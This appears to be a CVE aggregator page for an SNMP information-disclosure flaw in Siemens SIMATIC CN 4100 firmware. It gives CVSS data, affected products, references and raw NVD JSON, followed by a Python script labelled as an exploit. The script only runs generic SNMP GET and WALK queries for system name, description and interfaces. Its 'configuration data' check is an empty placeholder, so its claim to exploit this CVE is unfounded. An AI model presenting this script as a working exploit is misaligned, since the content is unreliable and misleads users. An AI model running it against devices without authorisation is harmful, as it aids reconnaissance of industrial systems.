CVE-2025-40940

Description

A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:* - NOT VULNERABLE

SIMATIC CN 4100 < V4.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-40940 PoC - SIMATIC CN 4100 SNMP Information Disclosure
# Description: Exploits inconsistent SNMP behavior to extract sensitive data

import socket
import sys
from pysnmp.hlapi import *

def snmp_get(community, target_ip, oid, version='2c'):
    """Send SNMP GET request to target device"""
    iterator = getCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1 if version=='2c' else 0),
        UdpTransportTarget((target_ip, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid))
    )
    
    errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
    
    if errorIndication:
        print(f"[ERROR] {errorIndication}")
        return None
    else:
        for varBind in varBinds:
            return str(varBind[1])

def snmp_walk(community, target_ip, oid_base, version='2c'):
    """Perform SNMP WALK to enumerate MIB tree"""
    results = []
    iterator = nextCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1 if version=='2c' else 0),
        UdpTransportTarget((target_ip, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid_base)),
        lexicographicMode=False
    )
    
    for errorIndication, errorStatus, errorIndex, varBinds in iterator:
        if errorIndication:
            break
        for varBind in varBinds:
            results.append((str(varBind[0]), str(varBind[1])))
    return results

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_40940_poc.py <target_ip> <community_string>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    community = sys.argv[2]
    
    print(f"[*] Targeting {target_ip} - CVE-2025-40940 PoC")
    print(f"[*] Testing SNMP service availability...")
    
    # Test basic system info disclosure
    sysDescr = snmp_get(community, target_ip, '1.3.6.1.2.1.1.1.0')
    if sysDescr:
        print(f"[+] System Description: {sysDescr}")
    
    sysName = snmp_get(community, target_ip, '1.3.6.1.2.1.1.5.0')
    if sysName:
        print(f"[+] System Name: {sysName}")
    
    # Enumerate interface info
    print("[*] Enumerating network interfaces...")
    ifTable = snmp_walk(community, target_ip, '1.3.6.1.2.1.2.2.1')
    print(f"[+] Found {len(ifTable)} interface entries")
    
    # Test for sensitive config exposure
    print("[*] Checking for exposed configuration data...")
    
    print("\n[!] Note: This PoC demonstrates SNMP information disclosure")
    print("[!] Requires valid community string and high-privilege access")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40940
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40940
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40940/
[4] VulDB https://vuldb.com/cve/CVE-2025-40940
[5] https://cert-portal.siemens.com/productcert/html/ssa-416652.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40940", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.813", "lastModified": "2025-12-10T21:34:59.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}